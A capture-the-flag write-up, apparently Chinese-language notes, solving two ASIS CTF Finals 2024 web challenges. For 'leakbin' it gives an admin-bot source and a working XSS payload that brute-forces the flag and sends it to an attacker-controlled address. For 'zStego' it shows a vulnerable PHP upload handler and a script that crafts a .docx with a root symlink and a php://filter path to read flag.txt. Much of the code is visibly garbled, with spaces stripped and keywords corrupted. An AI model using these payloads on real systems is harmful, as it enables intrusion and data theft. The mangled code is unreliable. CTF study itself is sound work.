functioncheckCode(){varsource=editor.getValue();fetch('/check',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({source:source})}).then(response=>response.json()).then(data=>{editor.operation(function(){editor.eachLine(function(line){editor.removeLineClass(line,'background','highlight-line');});});if(data.status===false&&data.error){varerrorLine=parseInt(data.error.split('line ').pop().split(',')[0])-1;console.log("Error at line:",errorLine);editor.addLineClass(errorLine,'background','highlight-line');}});}
// From ASIS CTF Finals 2024 - leakbin
constpuppeteer=require("puppeteer");constPORT=process.env.PORT||1337;constSITE=`http://localhost:${PORT}`;constFLAG=process.env.FLAG||"TRX{fake_flag_for_testing}";constFLAG_REGEX=/^TRX{[a-z0-9_]+}$/;constsleep=async(ms)=>newPromise((resolve)=>setTimeout(resolve,ms));constvisit=(payload)=>{returnnewPromise(async(resolve,reject)=>{if(!FLAG_REGEX.test(FLAG)){returnreject(newError("Error: Flag does not match flag regex, contact an admin if this is on remote"));}letbrowser,context,page;try{browser=awaitpuppeteer.launch({headless:true,args:['--no-sandbox','--disable-setuid-sandbox','--js-flags=--noexpose_wasm,--jitless'// this is a web chall :)
],dumpio:true,pipe:true,executablePath:process.env.PUPPETEER_EXECUTABLE_PATH});// incognito btw
context=awaitbrowser.createBrowserContext();page=awaitcontext.newPage();awaitpage.goto(SITE,{waitUntil:"domcontentloaded",timeout:5000});awaitpage.evaluate((flag)=>{localStorage.setItem("secret",flag);},FLAG);awaitpage.close();}catch(err){console.error(err);if(browser)awaitbrowser.close();returnreject(newError("Error: Setup failed, if this happens consistently on remote contact an admin"));}resolve("Success!");try{page=awaitcontext.newPage();awaitpage.goto(`${SITE}?payload=${encodeURIComponent(payload)}`,{waitUntil:"domcontentloaded",timeout:5000});awaitsleep(1000);}catch(err){console.error(err);}if(browser)awaitbrowser.close();});};module.exports={visit};
ImporthttpxBASE="http://localhost:1337"DEST=""?#外带地址Payroll='''
<img src onerror="
window.flag = 'TRX{';
for (let j = 0; j <= 60; j++) {
for (let i = 32; i <= 126; i++) {
let c = String. from CharCode(i);
if(window.find(window.flag + c,true,false,true)) {
window.flag += c;
console.log(window.flag);
to break;
}
}
}
top.document.body.innerHTML += '<img src onerror=`<<<DEST>>/flag?' +window.flag+'`>';
">
'''payload=payload.replace("<<DEST>>, DEST)payload=''.join(f' \\ x{ord(c):02x}'forcinpayload)print(BASE+"/? payload="+payload)response=httpx.post(BASE+"/visit",json={"payload":payload})print(response.text)
注意一下为了完整的将payload传输,我们需要hex一下。
最后外带
zStego
简介
Modern day script kiddies like to encrypt their conversations using this weird "zlib" thing. I had literally never heard of it.
Doesn't look safe, you say? Well, no one expects it so it works!
I created this majestic tool to look for zlib-encrypted messages in Word documents, because I'm fascinated by this zlib-encryption everyone uses.
(TRX script kiddies left a flag in /flag.txt)
/* processing uploaded Word - valid document contains relationship table */$zip=newZipArchive();$zipFilename=$_FILES['input']['tmp_name'];if($zip->open($zipFilename)!==true||$zip->locateName(REL_FILENAME)===false)hellYeah(400,'File is not a valid Word document.');//解析成SimpleXML对象
$relsDom=simplexml_load_string($zip->getFromName(REL_FILENAME));if($relsDom===false)hellYeah(400,'Invalid object relationship table. Document may be corrupted.');/* extract document's "media" folder into a temporary directory */$tmpDir=exec("mktemp -d --tmpdir=/tmp/ zipXXXXXXXXX");//创建临时目录,目录名随机
shell_exec("unzip $zipFilename\"word/media*\" -d \"$tmpDir\"");
function cleanup($tmpDir) { shell_exec("rm-rf$tmpDir"); }
register_shutdown_function('cleanup', $tmpDir); // cleanup in the end
chdir("$tmpDir/word/media");
ini_set('open_basedir', '.');
$messages = [];
foreach($relsDom->Relationship as $rel) {
if($rel['Type'] == 'http://schemas.openxmlformats.org/officeDocument/2006/relationships/image') {
if (!str_starts_with($rel['Target'], 'media/'))
continue;
$filename = substr($rel['Target'], 6);
$file = @file_get_contents($filename);
if ($file === false) // Object relationship table points to inexistent file. Document may be corrupted
break;
$result = @zlib_decode($file); // This will expose them hackers!
if ($result !== false)
$messages[] = $result;
}
}
importosimportzipfileimportrequestsdefZipDir(inputDir,outputZip):'''Zip up a directory and preserve symlinks and empty directories'''zipOut=zipfile.ZipFile(outputZip,'w',compression=zipfile.ZIP_DEFLATED)rootLen=len(os.path.dirname(inputDir))def_ArchiveDirectory(parentDirectory):contents=os.listdir(parentDirectory)# store empty directoriesifnotcontents:# http://www.velocityreviews.com/forums/t318840-add-empty-directory-using-zipfile.htmlarchiveRoot=parentDirectory[rootLen:].replace('\\','/').lstrip('/')zipInfo=zipfile.ZipInfo(archiveRoot+'/')zipOut.writestr(zipInfo,'')foritemincontents:fullPath=os.path.join(parentDirectory,item)ifos.path.isdir(fullPath)andnotos.path.islink(fullPath):_ArchiveDirectory(fullPath)else:archiveRoot=fullPath[rootLen:].replace('\\','/').lstrip('/')ifos.path.islink(fullPath):# http://www.mail-archive.com/[email protected]/msg34223.htmlzipInfo=zipfile.ZipInfo(archiveRoot)zipInfo.create_system=3# long type of hex val of '0xA1ED0000L',# say, symlink attr magic...zipInfo.external_attr=2716663808zipOut.writestr(zipInfo,os.readlink(fullPath))else:zipOut.write(fullPath,archiveRoot,zipfile.ZIP_DEFLATED)_ArchiveDirectory(inputDir)zipOut.close()defpack_payload(zip_filename):tmp_dir="./tmp/"word_dir=os.path.join(tmp_dir,"word")rels_dir=os.path.join(word_dir,"_rels")media_symlink=os.path.join(word_dir,"media")os.makedirs(rels_dir,exist_ok=True)# Create the document.xml.rels file with user-defined contentrels_content="""
<?xml version='1.0' encoding='UTF-8'?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/php://filter/read=zlib.deflate/resource=flag.txt"/>
</Relationships>
""".strip()withopen(os.path.join(rels_dir,"document.xml.rels"),"w")asf:f.write(rels_content)ifnotos.path.exists(media_symlink):os.symlink("/",media_symlink)zip_path=os.path.join(tmp_dir,zip_filename)ZipDir(tmp_dir,zip_path)returnzip_pathdefupload_zip(zip_path,url):withopen(zip_path,'rb')asf:files={'input':(os.path.basename(zip_path),f,'application/vnd.openxmlformats-officedocument.wordprocessingml.document')}response=requests.post(url,files=files)print("Status:",response.status_code)print("Body:",response.text)if__name__=="__main__":zip_filename="output.docx"upload_url="http://localhost:1337/upload.php"zip_path=pack_payload(zip_filename)upload_zip(zip_path,upload_url)
